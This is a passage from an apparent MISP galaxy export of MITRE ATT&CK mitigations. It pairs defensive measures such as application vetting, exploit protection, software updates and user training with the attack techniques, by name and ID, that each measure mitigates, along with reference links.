mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"

Table 4290. Table References
Links
https://attack.mitre.org/mitigations/M1030

Application Vetting - M1005

Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.

Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.

Application Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.

The tag is: misp-galaxy:mitre-course-of-action="Application Vetting - M1005"

View relationships graph

Application Vetting - M1005 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Injection - T1540" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1617" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Evasion - T1618" with estimative-language:likelihood-probability="almost-certain"

Table 4291. Table References
Links
https://attack.mitre.org/mitigations/M1005

Exploit Protection - M1050

Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Protection - M1050"

View relationships graph

Exploit Protection - M1050 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 4292. Table References
Links
https://attack.mitre.org/mitigations/M1050

User Guidance - M1011

Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.

The tag is: misp-galaxy:mitre-course-of-action="User Guidance - M1011"

View relationships graph

User Guidance - M1011 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remotely Wipe Data Without Authorization - T1469" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIM Card Swap - T1451" with estimative-language:likelihood-probability="almost-certain"

Table 4293. Table References
Links
https://attack.mitre.org/mitigations/M1011

Enterprise Policy - M1012

An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.

The tag is: misp-galaxy:mitre-course-of-action="Enterprise Policy - M1012"

View relationships graph

Enterprise Policy - M1012 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

Table 4294. Table References
Links
https://attack.mitre.org/mitigations/M1012

Interconnection Filtering - M1014

In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).

The tag is: misp-galaxy:mitre-course-of-action="Interconnection Filtering - M1014"

View relationships graph

Interconnection Filtering - M1014 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

Table 4295. Table References
Links
https://attack.mitre.org/mitigations/M1014
https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

Rootkit Mitigation - T1014

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Rootkit Mitigation - T1014"

View relationships graph

Rootkit Mitigation - T1014 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4296. Table References
Links
https://attack.mitre.org/mitigations/T1014
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Update Software - M1051

Perform regular software updates to mitigate exploitation risk.

The tag is: misp-galaxy:mitre-course-of-action="Update Software - M1051"

View relationships graph

Update Software - M1051 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 4297. Table References
Links
https://attack.mitre.org/mitigations/M1051

Vulnerability Scanning - M1016

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

The tag is: misp-galaxy:mitre-course-of-action="Vulnerability Scanning - M1016"

View relationships graph

Vulnerability Scanning - M1016 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"

Table 4298. Table References
Links
https://attack.mitre.org/mitigations/M1016

Mshta Mitigation - T1170

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Mshta Mitigation - T1170"

View relationships graph

Mshta Mitigation - T1170 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

Table 4299. Table References
Links
https://attack.mitre.org/mitigations/T1170

User Training - M1017

Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

The tag is: misp-galaxy:mitre-course-of-action="User Training - M1017"

View relationships graph

User Training - M1017 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001" with estimative-language:likelihood-probability="almost-certain"
